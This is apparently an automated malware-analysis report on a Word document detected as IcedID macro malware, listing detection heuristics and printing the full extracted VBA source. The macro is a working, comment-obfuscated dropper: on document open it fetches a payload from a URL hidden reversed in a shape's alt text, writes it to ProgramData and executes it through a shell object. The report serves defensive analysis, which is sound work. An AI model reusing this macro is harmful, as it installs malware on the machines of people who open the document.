MALICIOUS
230
Risk Score
Heuristics 6
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set WXfxU = CreateObject("Script" + cxEym) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12007 bytes |
SHA-256: 78c712b357233fb7193e3b45427818b0dead249f622ada95ee6d0888cd8c697c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "qKlAh"
Sub Pwibp(KWqnA, Optional ByVal llSFg As String = "c:\programdata\KZggW.txt", Optional ByVal cxEym As String = "ing.FileSystemObject")
' Crawling pawn traitor vista genetics
' Entreat stagnating grating disarmed bawls
' Fluorocarbons geranium
' Antelope motorcade shakeups burbles interactional unshaven grimly
' Defacing factionalism excess
' Connoisseurs unseasonably stagflation perceived haul
' Turbocharged reverser westwards erred geldings uneasily
' Sexists propelling
' Airlifted debts coronal
' Signatory transcriptional footnotes
' Testifying hunts
' Atonality unquantifiable abominate
' Acclamations lilacs diocesan
' Poppycock
' Covalent eyeglass inventors dimly
' Cashed fatal octagonal throngs claps
' Unowned
' Pioneers cretinous coloury
Set WXfxU = CreateObject("Script" + cxEym)
' Computably sandwiched disease
' Curare
' Diluent personified boated hour
' Leftists idolatrous weeklies sermons
' Retouching patronised regularities
Set kcGSe = WXfxU.CreateTextFile(llSFg)
' Passers petrochemical checkup dauber displacer
' Deleteriously grandmother ordaining
' Brighten unbraced keel
' Twirled neurosurgeons dignify
' Insecure aegean stony
' Manually rudeness workloads blithe
' Chaffinch statuary leadership subversive
' Absence committee kept reiterated insertion
kcGSe.WriteLine KWqnA
' Collies entries
' Fruited hairsplitting
' Bombastic stoutest
' Unctuously tendril headlamp
' Halfway aquifers punted
' Feet eukaryotic overripe copout railways wreckage
kcGSe.Close
' Liverish painfulness dependence
' Intercom toward disbanding
' End eggshells attacking puddle sulkily astonished
' Slim
' Precision mount distributable fawned stormtroopers evict
' Sunflowers news
' Sundry slithered
' Oscillator islets malleable
' Hammocks reconditioned
' Salver gambles
' Provincial gating profitable stunted neptunium
' Cursed bided unbolt cab bicker
' Adherents
' Medieval gorgon tight
' Misguide exhibitor
' Allowable
' Hopped woollier
' Gastric floored jeopardised calorimetry
' Bacteriophage
' Majestic chromosome bosnia proportions misbegotten
' Groove
' Sunburst negotiators anatomy
' Lustier goldsmith overcommitments
' Skyscraper irreproachable supplemental
' Proverbs figs promulgating interchangeability
' Liberty roar retains exmembers
' Fibbed vends arithmetical communicate fruited tossup
' Consists
' Toothbrushes fruition differing
' Petrification multiplier phoning tombs
' Guzzling salutations
' Fines mellow
' Style interleave lustily
' Joiners expunges
' Stations floridly couther deary
' Uncured product
' Finances certified
' Unnatural neatly corpse enclave sordidness
End Sub
' Tailorable despair heckler reabsorb
' Mutinous magisterial amber
' Plaything loosing embalming
' Rioting basrelief grid inchoate
Sub AutoOpen()
' Schemas alarmingly belongs physiotherapy indifferent anise
' Systematise laryngeal overlie interchanges
' Whereabouts centralise lignite soccer committed
' Quarrelled neoplasm
' Compulsive slurp
' Drinkable knavery
' Headaches truncates longings profiles
' Forge
' Actuating utters
' Troublemakers entertained unacceptably deportees
' Crotchless trot
' Oiliest
' Behaviour breathing agaves whee
' Cabriolet confusable contrapuntal evenhanded
' Induced galoshes trumped
' Servicemen reaffirmation
' Scintillating
' Pessimistic stories zany excessively prophetically
' Barb
' Infidelities population entrepreneurs
' Gravel shortened rigged nippon hypothetical
' Putrescent dinar shogun submerging
' Giantkiller sensing refining
' Litigious
' Retry nonplussed
' Bookkeeper cancellation clouted scold
' Monumentally guanaco manufactured headiest livelihoods uneaten analogues
' Statures gushing stalemates
' Shrieker
' Nutritionists pushy trimming thymus lento
Dim xLYGQ As New iekTC
' Peerless jubilees sails
' Liquefied suntanned thermodynamic avoided watchman engulfing
' Pontificating distributional wildfires
' Embolden cheeses
' Exacts
KWqnA = xLYGQ.qyItw("MSXML2.serverXMLHTTP")
' Catalysts cure
' Trilby sties pawnbrokers handover borehole broaden
' Shames kingpin
' Vibrations exonerates pianoforte diagnosing
' Chaffinch doublecross merited
Pwibp oHFrs(KWqnA)
' Stillborn inherently dither incompatibilities
' Ageless crystallography
' Triathlon injection unlovable instrumentalists pickpocket
' Widens
' Goalless impelling dehydrated validation
' Statistician internals unearth
' Fusiliers asbestosis buffetings cube
' Homogeneously halfsister velour reintroduction seared binary ripoff
' Dodo jetplane
' Clutched sixteenth tyrannies
' Bunches objected slither overstress yoyo
' Railwayman impeachment lagging saltier
' Feverish grafted juniper innocuousness
TSAAx ICfFi(0) + "vr32 c:\programdata\KZggW.txt", "ws"
End Sub
Function OSvvN(cIMvm, ZnTIz)
' Localities
' Ethanol unction heaping
' Liquidising saw
' Exploit
' Tossup
OSvvN = Split(cIMvm, ZnTIz)
End Function
Attribute VB_Name = "Ozgaj"
' Folio weak broach mink purchases home predominantly
' Chafes jell
' Creaky
' Psychoanalyse pawn reminders
Function oHFrs(CCJEE)
' Groomed intact heterosexuality
' Compound encore
' Lotus certainly imaginative lecherous
' Obstacle carcass teatime rearrangements standby
oHFrs = StrConv(CCJEE, vbUnicode)
' Ruining ruining
' Bladed mastodon monopoles angstroms
' Apian officerships hirsuteness nits
' Gloom follows
' Irrelevancy singular
End Function
' Four globule
' Lambing analyst
' Egotists swimsuits reoccupied scorned propels lovely
' Instructor
' Intangible amalgamating popup
' Rime censoring
' Eosin irradiating checkup geodesic envelops
Function QanMi()
' Retelling baton daintily
' Reapplying frolics
' Daemonic badly romancer boar
' Surrendering poles graphic compromises termini
' Materialise elixirs separability tradings eases crouching crewed
' Endometriosis transcription flexed
' Cervix superior
' Rubberstamping sociologically accosting collided gulping dotty
' Cramming newsagent oversimplification
' Symbolise reimporting
' Presumptuously escalator abducts thorax mediation
' Fixates defiled cloudiness crucify
With ActiveDocument.shapes(1)
QanMi = .AlternativeText
End With
End Function
' Hastily homecoming
' Revving foot toady erotically
' Enchantments handicrafts
' Commutative clearcut asymptotically propensity glazing
Function ICfFi(nLcSW)
' Oner ensigns radial nobility dissonance inquires
' Punters fascia jigs
' Badly
' Vows propulsion combusts
' Investigate decoupling pretentiousness
' Warranty ovular
' Fulminating
' Intruded pennames knavery
' Declension clapper nobles immovable
' Synthesise purposive
mlrSH = QanMi()
PsYGo = OSvvN(mlrSH, "###")
gwFEB = PsYGo(nLcSW)
ICfFi = gwFEB
End Function
Attribute VB_Name = "iekTC"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Typical grits refilling cowgirls motherland
' Novelle disinfectants
' Fairgrounds perjury
' Enchanter transcripts irreparable cobwebbed
' Teacup thoroughness
Function qyItw(swpei)
' Hospitalised unpasteurised soaked
' Thou tongue
' Axon highest decompositions unleashed whisperings
' Magnificent endued imploringly
' Bowels
' Sticklebacks impi grouper gums
' Tropic unforgiving practicals
Dim qYntn As Object
' Herbaceous senseless deprave
' Chew overlies majorities
' Broil bolsters
' Crumpets stellar
' Silently stairway fathomed
' Fixers rampant atonic festoons treadle
' Tossing scooting hypercholesterolaemia pears itchy
' Fullstop amateur
' Militaristic transferred nonevent
' Pacer
' Misalignment winsome
' Merchantability forbearing
' Kaleidoscopic internationalisation
' Conformation debits frugal formats
' Deactivation illiquid
Set qYntn = CreateObject(swpei)
' Concussion dismiss
' Gravitation maturer
' Acoustically dumfounding stemming homogenised spellers
' Midden
' Copyist sometimes
' Rasing fluxes tip
' Sailcloth packings replicator
' Gargled moneyless
' Slicked handcuff
' Bustling softly wet diabolic user shareholdings midsummer
' Coquettes repeals senatorial
' Batmen little colourants lemming
' Courteous turntables polygamous uvular
' Dissident twee gannet rigour
' Unproven bishopric ottoman
' Slurs hobbyists lobs private begins
' Bistro helix
' Ransoming overshoot
' Reinitialising heartwood knacks mimetic
' Silkier barefooted businessman imperiously hydrostatics
' Exclusiveness landscaped
zJxWz = ICfFi(1)
' Taipei tadpoles worldwide quintessential artisans
' Overture tabasco
' Metamorphose pejorative
' Compartmentalised clouted rustle contraceptive backhanded
qYntn.Open "GET", Reverse(zJxWz), False
' Burr jabbered whisky dilutes retort testicle assiduously
' Sunburst redaction nadir placental pedestal
' Mismatch impugn hamitic chose byway
' Cuckoos gatherer
' Erogenous winery technical transcend
' Nail thumb oriented borders legitimated incentives
qYntn.Send
' Launder insurance freshwater gluten
' Hinted correspond superimposes downturns cackled
' Accomplices fascinatingly zambia
' Lured esteems
' Drawbacks stabiliser pacemen
qyItw = qYntn.responsebody
End Function
Attribute VB_Name = "nkmqO"
Sub TSAAx(lbYzE, YMXyH)
' Jumps please beneficent perfunctory sepulchres mundane
' Introduced pursues candies
' Littler envelops
' Demist destroyer
' Foxhounds comparability rustiest
' Callings enthused creamier hiccup silliest
' Surrendered metier
Set rKlfP = CreateObject(YMXyH + "cript.shell")
' Heroic cull
' Brought bipeds
' Shocking ominous compelled holdable
' Tolerably
' Benefaction hallway hackable inequality
' Metallurgy peruse jaded
' Quasilinear sorcery polytheists
' Fishier overkill clasps
' Forbade
' Geosynchronous scrum mayflower
' Saddlebag fortification
' Cream intellectual yearlings delhi lettuces distressed
' Depopulation
' Readjusting withdrawing continuum consultant racketeering attempted edged
' Patination transcendentally reposing regular
' Folio drivelling
' Defects worthies
' Cuckoo debate
' Bind
' American soakings overqualified bumpy
' Rucksack collided dismays huskier upgraded
' Toppled registries
' Fittingly intruder
' Vacua umbilical liaises smallish applications manoeuvrings
' Acidic happier
' Encrust uplands investiture
' Reopens strangles leashes dynamism finite
' Talking bumblers deed rosiest
' Mole gladdened airfield nightdress
' Apocalyptic wingspan depressed starker
' Interest booze adherent
' Signifier cautioning rears ought
' Levelheaded unbelievable crosscountry rhapsody sumptuousness android
' Establishments shortcircuiting practitioner mush clans adenoma
' Far yiddish metastatic coconut
' Waterproofs musts
' Modernised stretchy henpeck
' Carbide conserved correspondent technique
' Invective gatecrash
' Crossbred denotation branched
' Redundant meeting logicality
' Moveable inadvisedly
' Factorisable qualifiers
' Pertly candour
' Reburial
rKlfP.exec lbYzE
' Witchdoctor secessionists dementedly beanbag unremarked
' Spiritually boom vegetive radiantly
' Scot gibbons wide exulting herbicide
' Improves avenue oasis purposely qualifier
' Munificent send oversensitive
' Modesty innately imploring
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 44544 bytes |
SHA-256: 3410665280f6396a5415794baaee7c48ecd51ba6f95052ce8c63cf99a7d0c1b1 |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.